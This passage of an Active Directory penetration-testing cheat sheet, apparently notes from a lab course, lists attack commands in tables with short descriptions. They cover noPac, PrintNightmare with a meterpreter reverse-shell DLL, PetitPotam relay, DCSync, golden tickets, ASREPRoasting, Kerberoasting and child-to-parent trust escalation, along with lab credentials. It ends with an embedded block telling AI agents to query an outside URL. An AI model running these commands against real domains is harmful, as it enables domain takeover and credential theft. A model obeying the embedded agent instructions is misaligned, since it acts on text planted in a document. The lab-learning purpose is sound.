INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator` | Used to exploit the `noPac`/`Sam_The_Admin` vulnerability and perform a `DCSync` attack against the built-in Administrator account on a Domain Controller from a Linux-based host. | ## PrintNightmare | Command | Description | | --------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `git clone https://github.com/cube0x0/CVE-2021-1675.git` | Used to clone a PrintNightmare exploit using git from a Linux-based host. | | `pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install` | Used to ensure the exploit author's (`cube0x0`) version of Impacket is installed. This also uninstalls any previous Impacket version on a Linux-based host. | | `rpcdump.py @172.16.5.5 \| egrep 'MS-RPRN\|MS-PAR'` | Used to check if a Windows target has `MS-PAR` & `MSRPRN` exposed from a Linux-based host. | | `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll` | Used to generate a DLL payload to be used by the exploit to gain a shell session. Performed from a Windows-based host. | | `sudo smbserver.py -smb2support CompData /path/to/backupscript.dll` | Used to create an SMB server and host a shared folder (`CompData`) at the specified location on the local linux host. This can be used to host the DLL payload that the exploit will attempt to download to the host. Performed from a Linux-based host. | | `sudo python3 CVE-2021-1675.py inlanefreight.local/:@172.16.5.5 '\\10.129.202.111\CompData\backupscript.dll'` | Executes the exploit and specifies the location of the DLL payload. Performed from a Linux-based host. | ## PetitPotam | Command | Description | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController` | Impacket tool used to create an `NTLM relay` by specifiying the web enrollment URL for the `Certificate Authority` host. Perfomred from a Linux-based host. | | `git clone https://github.com/topotam/PetitPotam.git` | Used to clone the `PetitPotam` exploit using git. Performed from a Linux-based host. | | `python3 PetitPotam.py 172.16.5.225 172.16.5.5` | Used to execute the PetitPotam exploit by specifying the IP address of the attack host (`172.16.5.255`) and the target Domain Controller (`172.16.5.5`). Performed from a Linux-based host. | | `python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 = dc01.ccache` | Uses `gettgtpkinit`.py to request a TGT ticket for the Domain Controller (`dc01.ccache`) from a Linux-based host. | | `secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL` | Impacket tool used to perform a DCSync attack and retrieve one or all of the `NTLM password hashes` from the target Windows domain. Performed from a Linux-based host. | | `klist` | `krb5-user` command used to view the contents of the `ccache` file. Performed from a Linux-based host. | | `python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$` | Used to submit TGS requests using `getnthash.py` from a Linux-based host. | | `secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba` | Impacket tool used to extract hashes from `NTDS.dit` using a `DCSync attack` and a captured hash (`-hashes`). Performed from a Linux-based host. | | `.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /=/ptt` | Uses Rubeus to request a TGT and perform a `pass-the-ticket attack` using the machine account (`/user:ACADEMY-EA-DC01$`) of a Windows target. Performed from a Windows-based host. | | `mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt` | Performs a DCSync attack using `Mimikatz`. Performed from a Windows-based host. | ## Miscellaneous Misconfigurations | Command | Description | | --------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------- | | `Import-Module .\SecurityAssessment.ps1` | Used to import the module `Security Assessment.ps1`. Performed from a Windows-based host. | | `Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL` | SecurityAssessment.ps1 based tool used to enumerate a Windows target for `MS-PRN Printer bug`. Performed from a Windows-based host. | | `adidnsdump -u inlanefreight\\forend ldap://172.16.5.5` | Used to resolve all records in a DNS zone over `LDAP` from a Linux-based host. | | `adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r` | Used to resolve unknown records in a DNS zone by performing an `A query` (`-r`) from a Linux-based host. | | `Get-DomainUser * \| Select-Object samaccountname,description` | PowerView tool used to display the description field of select objects (`Select-Object`) on a target Windows domain from a Windows-based host. | | `Get-DomainUser -UACFilter PASSWD_NOTREQD \| Select-Object samaccountname,useraccountcontrol` | PowerView tool used to check for the `PASSWD_NOTREQD` setting of select objects (`Select-Object`) on a target Windows domain from a Windows-based host. | | `ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts` | Used to list the contents of a share hosted on a Windows target from the context of a currently logged on user. Performed from a Windows-based host. | ## Group Policy Enumeration & Attacks | Command | Description | | --------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE` | Tool used to decrypt a captured `group policy preference password` from a Linux-based host. | | `crackmapexec smb -L \| grep gpp` | Locates and retrieves a `group policy preference password` using `CrackMapExec`, the filters the output using `grep`. Peformed from a Linux-based host. | | `crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin` | Locates and retrieves any credentials stored in the `SYSVOL` share of a Windows target using `CrackMapExec` from a Linux-based host. | | `Get-DomainGPO \| select displayname` | PowerView tool used to enumerate GPO names in a target Windows domain from a Windows-based host. | | `Get-GPO -All \| Select DisplayName` | PowerShell cmd-let used to enumerate GPO names. Performed from a Windows-based host. | | `$sid=Convert-NameToSid "Domain Users"` | Creates a variable called `$sid` that is set equal to the `Convert-NameToSid` tool and specifies the group account `Domain Users`. Performed from a Windows-based host. | | `Get-DomainGPO \| Get-ObjectAcl \| ?{$_.SecurityIdentifier -eq $sid` | PowerView tool that is used to check if the `Domain Users` (`eq $sid`) group has any rights over one or more GPOs. Performed from a Windows-based host. | | `Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532` | PowerShell cmd-let used to display the name of a GPO given a `GUID`. Performed from a Windows-based host. | ## ASREPRoasting | Command | Description | | -------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `Get-DomainUser -PreauthNotRequired \| select samaccountname,userprincipalname,useraccountcontrol \| fl` | PowerView based tool used to search for the `DONT_REQ_PREAUTH` value across in user accounts in a target Windows domain. Performed from a Windows-based host. | | `.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat` | Uses `Rubeus` to perform an `ASEP Roasting attack` and formats the output for `Hashcat`. Performed from a Windows-based host. | | `hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt` | Uses `Hashcat` to attempt to crack the captured hash using a wordlist (`rockyou.txt`). Performed from a Linux-based host. | | `kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt` | Enumerates users in a target Windows domain and automatically retrieves the `AS` for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host. | ## Trust Relationships - Child > Parent Trusts | Command | Description | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------ | | `Import-Module activedirectory` | Used to import the `Active Directory` module. Performed from a Windows-based host. | | `Get-ADTrust -Filter *` | PowerShell cmd-let used to enumerate a target Windows domain's trust relationships. Performed from a Windows-based host. | | `Get-DomainTrust` | PowerView tool used to enumerate a target Windows domain's trust relationships. Performed from a Windows-based host. | | `Get-DomainTrustMapping` | PowerView tool used to perform a domain trust mapping from a Windows-based host. | | `Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL \| select SamAccountName` | PowerView tools used to enumerate users in a target child domain from a Windows-based host. | | `mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt` | Uses Mimikatz to obtain the `KRBTGT` account's `NT Hash` from a Windows-based host. | | `Get-DomainSID` | PowerView tool used to get the SID for a target child domain from a Windows-based host. | | `Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" \| select distinguishedname,objectsid` | PowerView tool used to obtain the `Enterprise Admins` group's SID from a Windows-based host. | | `ls \\academy-ea-dc01.inlanefreight.local\c$` | Used to attempt to list the contents of the C drive on a target Domain Controller. Performed from a Windows-based host. | | `mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt` | Uses `Mimikatz` to create a `Golden Ticket` from a Windows-based host . | | `.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt` | Uses `Rubeus` to create a `Golden Ticket` from a Windows-based host. | | `mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm` | Uses `Mimikatz` to perform a DCSync attack from a Windows-based host. | | `secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt` | Impacket tool used to perform a DCSync attack from a Linux-based host. | | `lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240` | Impacket tool used to perform a `SID Brute forcing` attack from a Linux-based host. | | `lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 \| grep "Domain SID"` | Impacket tool used to retrieve the SID of a target Windows domain from a Linux-based host. | | `lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 \| grep -B12 "Enterprise Admins"` | Impacket tool used to retrieve the `SID` of a target Windows domain and attach it to the Enterprise Admin group's `RID` from a Linux-based host. | | `ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker` | Impacket tool used to create a `Golden Ticket` from a Linux-based host. | | `export KRB5CCNAME=hacker.ccache` | Used to set the `KRB5CCNAME Environment Variable` from a Linux-based host. | | `psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5` | Impacket tool used to establish a shell session with a target Domain Controller from a Linux-based host. | | `raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm` | Impacket tool that automatically performs an attack that escalates from child to parent domain. | ## Trust Relationships - Cross-Forest | Command | Description | | -------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------- | | `Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL \| select SamAccountName` | PowerView tool used to enumerate accounts for associated `SPNs` from a Windows-based host. | | `Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc \| select samaccountname,memberof` | PowerView tool used to enumerate the `mssqlsvc` account from a Windows-based host. | | `.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap` | Uses `Rubeus` to perform a Kerberoasting Attack against a target Windows domain (`/domain:FREIGHTLOGISTICS.local`) from a Windows-based host. | | `Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL` | PowerView tool used to enumerate groups with users that do not belong to the domain from a Windows-based host. | | `Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator` | PowerShell cmd-let used to remotely connect to a target Windows system from a Windows-based host. | | `GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley` | Impacket tool used to request (`-request`) the TGS ticket of an account in a target Windows domain (`-target-domain`) from a Linux-based host. | | `bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2` | Runs the Python implementation of `BloodHound` against a target Windows domain from a Linux-based host. | | `zip -r ilfreight_bh.zip *.json` | Used to compress multiple files into 1 single `.zip` file to be uploaded into the BloodHound GUI. | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dado1513.dev/active-directory/active-directory-pentesting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.